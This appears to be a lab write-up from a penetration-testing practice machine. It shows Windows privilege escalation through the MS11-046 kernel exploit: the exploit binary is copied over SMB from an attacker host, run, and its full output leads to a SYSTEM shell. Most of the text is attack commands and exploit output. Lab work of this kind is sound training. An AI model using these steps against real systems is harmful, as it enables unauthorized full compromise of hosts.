MS11-046
/Practice/AuthBy/5-Privilege_Escalation/attachments/{2F1715D1-A7D0-45D2-A4D9-D8FC9EC377A7}-1.png)
The target system is an extremely outdated,Microsoft Windows Server 2008 Standard, which is vulnerable to many exploits including MS11-046, or CVE-2011-1249
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ cp /home/kali/Tools/windows-kernel-exploits/MS11-046/ms11-046.exe .
C:\> mkdir tmp && cd tmp
C:\tmp> copy \\192.168.45.245\smb\MS11-046.exe .
1 file(s) copied.Delivery complete over SMB
C:\tmp> MS11-046.exe
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows Server 2008
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8163c000
[*] Offset: 0x00b40000
[+] HalDispatchTable
[*] Offset: 0x00c38418
[+] NtQueryIntervalProfile
[*] Address: 0x76ef8ac8
[+] ZwDeviceIoControlFile
[*] Address: 0x76ef8438
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
c:\Windows\System32> whoami
nt authority\system
c:\Windows\System32> hostname
LIVDA
c:\Windows\System32> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2d12:cfc9:2a58:43c4%12
IPv4 Address. . . . . . . . . . . : 192.168.203.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.203.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : System Level Compromise